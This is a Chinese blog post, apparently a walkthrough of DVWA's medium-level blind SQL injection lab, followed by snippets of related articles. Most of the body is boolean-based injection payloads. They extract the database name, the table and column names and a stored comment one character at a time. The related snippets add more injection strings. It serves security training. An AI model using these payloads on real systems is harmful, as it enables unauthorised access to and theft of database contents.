DVWA-SQL盲注 medium

最新推荐文章于 2023-05-30 10:29:30 发布
最新推荐文章于 2023-05-30 10:29:30 发布
阅读量419 收藏 3
点赞数 3
文章标签: sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/IWANnaaa/article/details/129928470
版权

提交id=1之后回显exists存在

 提交id=’之后回显missing 不存在,进一步判断是否是数字型SQL注入

 数字型 exists

字符型missing,确定为数字型SQL注入,进行猜解数据库版本、昵称。

1 and ascii(substr(database(),1,1))>88  # exists 
1 and ascii(substr(database(),1,1))>105 # MISSING
1 and ascii(substr(database(),1,1))>96  # exists
1 and ascii(substr(database(),1,1))>100 # MISSING
1 and ascii(substr(database(),1,1))>98  # exists
1 and ascii(substr(database(),1,1))=99  # MISSING
1 and ascii(substr(database(),1,1))=100 # exists
1 and ascii(substr(database(),2,1))=118 # exists
1 and ascii(substr(database(),3,1))=119 # exists
1 and ascii(substr(database(),2,1))=96  # exists

判断出当前数据库为dvwa,接下来判断该数据库中表的个数

使用select count()函数

1 and (select count(table_name) from information_schema.tables where table_schema=database())<5 #

 表个数小于5,存在

表个数=2,存在,接着查询表1的长度,我们需要的是guestbook表

 1 and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #

 

等于9存在,也就是证明表一是guestbook表了。

 

g:

1 and ascii(substr((select table_name from information_schema.tables

where table_schema=database() limit 0,1),1))=103 #

u:

1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2))=117 #

e:

1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3))=101 #

s:

1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4))=115 #

t:

1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),5))=116 #

b:

1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),6))=98 #

o:

1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),7))=111 #

o:

1 and ascii(substr((select table_name from information_schema.tables

where table_schema=database() limit 0,1),8))=111 #

k:

1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),9))=107 #

猜出表昵称是guestbook之后就可以猜字段个数了。

 1 and (select count(column_name) from information_schema.columns where table_name=0x6775657374626f6f6b)=2 #   

存在(字段之前被我改成两个了,注此处应进行十六进制编码)

id=1 and length((select column_name from information_schema.columns where table_schema=database() and table_name=0x6775657374626f6f6b  limit 0,1))=7 # 判断第一个字段的长度为7,接下来查询字段的昵称

 

c:

id=1 and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name=0x6775657374626f6f6b  limit 0,1),1))=99 #

o:

id=1 and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name=0x6775657374626f6f6b  limit 0,1),2))=111 #

m:

id=1 and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name=0x6775657374626f6f6b  limit 0,1),3))=109 #&Submit=Submit

m:

id=1 and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name=0x6775657374626f6f6b  limit 0,1),4))=109 #&Submit=Submit

e:

id=1 and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name=0x6775657374626f6f6b  limit 0,1),5))=101 #&Submit=Submit

n:

id=1 and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name=0x6775657374626f6f6b  limit 0,1),6))=110 #&Submit=Submit

t:

id=1 and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name=0x6775657374626f6f6b  limit 0,1),7))=116 #&Submit=Submit

查出来字段为comment 接下来查字段中的数据个数

id=1 and (select count(comment) from guestbook)=1 #&Submit=Submit

查找数据:

T: 

id=1 and ascii(substr((select comment from guestbook limit 0,1),1,1))=84 #&Submit=Submit

 

数据为This is a test comment.

例:如果需要查询该字段中第二个数据就需要将标红处改为+1

id=1 and ascii(substr((select comment from guestbook limit 0,1),1,1))=84 #&Submit=Submit

KKKun's
关注
DVWA-SQL盲注
HoYim
03-05 548
基于布尔的盲注 判断是否存在注入,注入是字符型还是数字型 输入1’and ‘1’=‘1,判断条件正确 输入1’ and ‘1’=‘2,判断条件错误 由此判断存在字符型注入 2.猜解当前数据库名 猜数据库名的长度 输入1’ and length(database())=4# 确定长度为4 然后猜数据库名字,可用二分法节省时间 输入1’ and ascii(substr(databse(),0...
DVWA-sql盲注
Darklord.W
04-09 817
sql盲注低中高步骤截图及说明 低等级: 判断是否存在注入,注入是字符型还是数字型 猜解数据库 库名长度为4 猜数据库名dvwa substr() 函数返回字符串的一部分 substr(string,start,length) 猜数据库中表名 可得表个数为2 猜表的长度 第一个为9,第二个为5 猜表名 1' and ascii(substr(...
DVWA sql注入 (Medium
gclome的博客
07-05 3172
上节虽然写了low,可是发现自己对判断是否有注入点还有判断是字符型注入或数字型注入还是不太清楚,于是又找了一个讲解: https://www.cnblogs.com/qq3285862072/p/9439573.html 现在开始做mediumSQL注入 由于上面不方便直接输入,于是用burpsuite进行拦截然后修改 1.改成1'改成1 and 1=1 改成1 and 1=2 则可以判断为数字...
dvwaSQL盲注
ANDTM的博客
05-30 1022
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。SQL盲注SQL注入的区别就是盲注它不会有完整的回显,这里分为两种,一种是布尔盲注,另一种是时间盲注
dvwa靶场中(Medium)安全等级sql注入
白帽小学二年级的博客
12-16 1419
sql注入教程详解 使用burpsuite将抓到的数据包转发到repeater模块 (burpsuite使用前需要将浏览器设置代理 判断是int还是str类型,显然是int类型 用order by关键字进行数据表中列数的判断 1 order by 1,2 //正常显示 1 order by 1,2,3 //报错,所以是两列 1 and 1=2 union select 1,database() //联合注入获取数据库名 1 a...
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
DvwaSQL盲注全级别学习笔记
Mbys_Lettuce的博客
09-19 1347
注入的同时观察页面返回信息,输入1' and (length(database()))=猜测的数据库长度,返回信息为User ID exists in the database则证明该数据库长度为猜测的长度。可以看到,Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,同时只有返回的查询结果数量为一时,才会成功输出,这样就有效预防了“脱裤”,Anti。因为有两个数值,且ASCII中97到122为小写字母的范围,所以把x的范围为1~4,y的范围为97~122。
基于dvwasql盲注(Blind)-低中高
滕财然的博客
11-15 2825
目录sql盲注sql注入的区别sql盲注过程dvwa-SQL Injection (Blind) low级别布尔盲注时间盲注dvwa-SQL Injection (Blind) Medium级别dvwa-SQL Injection (Blind) High级别 sql盲注sql注入的区别 盲注:目标只会回复是或不是,没有详细内容 注入:可以查看到详细内容 盲注分为:布尔盲注、时间盲注...
DVWAsql盲注
qq_39670065的博客
08-08 2881
写在前面: 当时刷sqli-labs也浑浑噩噩没有做啥总结,现在就先从sql盲注总结开始吧 SQL Injection(Blind) SQL盲注与一般注入的区别在于:一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知 sql盲注又分为布尔盲注,时间盲注和基于报错的盲注 理论上,能够布尔盲注就一定能时间盲注,能够时间盲注不一定能布尔盲注。相比之下,布尔盲注稳定性更好,时间盲注适用范围更广,但因为时间盲注的实现原理是基
DVWA--SQL Injection(SQL注入-非盲注)(全难度)
wwxxee
03-03 381
DVWASQL Injection(SQL 注入)非盲注 原理参考:网络安全笔记-99-渗透-SQL注入 逻辑 输入id查询用户名。 难度分级 Low 单引号闭合,且有报错提示。 核心代码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_n
dvwa-sql盲注
AI_SumSky的博客
11-27 4679
sql盲注 low级别 先提交个参数,发现执行成功就是回显时只是说这个id存在数据库,没有回显出id具体信息,怪不得叫盲注。 分析源码没有对所提交参数id做任何处理就直接执行了,只是回显的时候被隐藏了。 其实也可以通过ascaii码来一个一个字符弄出来,输入1’ and length(database())=1#,显示User ID is MISSING from the database. 输入1’ and length(database())=2#,显示User ID is MISSING from
DVWA——SQL盲注(全等级)
@一只躺平的猪@的博客
07-13 5595
SQL盲注与一般注入的区别在于:一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。一般有两种方式:布尔型和时间型。还有一种是报错注入,本章主要介绍布尔盲注。布尔型是根据页面是否正确显示来判断我们构造的语句是否正确执行时间型则是根据页面加载时间是否变化来判断的。SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(
DVWASQL注入(盲注
天空之蓝的博客
11-17 3075
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。
DVWA SQL Injection Medium
Ramona的博客
11-27 461
Mdeium 基本的步骤及知识点在上节已经提到过这里不再赘述:https://blog.csdn.net/WQ_BCJ/article/details/84554777 1)与low级别不同,本次采用的是下拉按钮的方式,限制了用户的输入,通过url可以发现并没有?id=.....类似的参数所以不是get方法,那么我们可以通过火狐的hackbar提交post数据试一试: 2)通过以上页...
DVWAsql注入(盲注
qq_74806534的博客
02-12 482
盲注,与一般注入的区别在于,一般地注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。
DVWAsql注入——盲注
Williamanddog的博客
12-22 3115
DVWA盲注
DVWA】--- 八、sql盲注(SQL Injection Blind)
qq_43168364的博客
05-31 743
SQL Injection Blind 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 注入点在输入框中,当输入正确时回显如下图 输入错误时的回显 根据回显不同进行布尔盲注,接下来判断注入类型 这里是字符型注入点字符型注入点 判断库名长度,命令:1' and length(database())=4 # 判断库名,命令:1’ and ascii(substr(database(),x,1))=100 #让x的值递增可以遍
DVWA sql盲注手工
永不垂头的博客
08-03 390
学习笔记—DVWA sql盲注手工 一、dvwasql盲注手工 1’and ascii(substr(database(),2,1))>'97 exists 1’and ascii(substr(database(),2,1))<'122 exists 1’and ascii(substr(database(),2,1))<'119 exists 1’and ascii(substr(database(),2,1))<'118 MISSING 1’and ascii(subs
渗透测试实验_基于DVWASQL盲注 安全等级Low Medium High
weixin_47133613的博客
03-20 5667
文章目录SQL盲注1. SQL盲注概述2. 基于布尔值的盲注3. 前期实验准备4. Low等级5. Medium等级6. High等级 SQL盲注 1. SQL盲注概述 以下内容引用自《SQL盲注(原理概述、分类)》 盲注: 即在SQL注入过程中,SQL语句执行查询后,查询数据不能回显到前端页面中,我们需要使用一些特殊的方式来判断或尝试,这个过程成为盲注 如果数据库运行返回结果时只反馈对错不会返回数据库中的信息 此时可以采用逻辑判断是否正确的盲注来获取信息。 盲注是不能通过直接显示的途径来获取数
dvwa靶场sql盲注
最新发布
08-15
靶场SQL盲注是指在DVWA(Damn Vulnerable Web Application)这个靶场中进行的SQL注入攻击。靶场中有一个名为dvwa的数据库,我们可以通过一系列的注入语句来探测这个数据库中的表的数量和表名的长度。 首先,通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值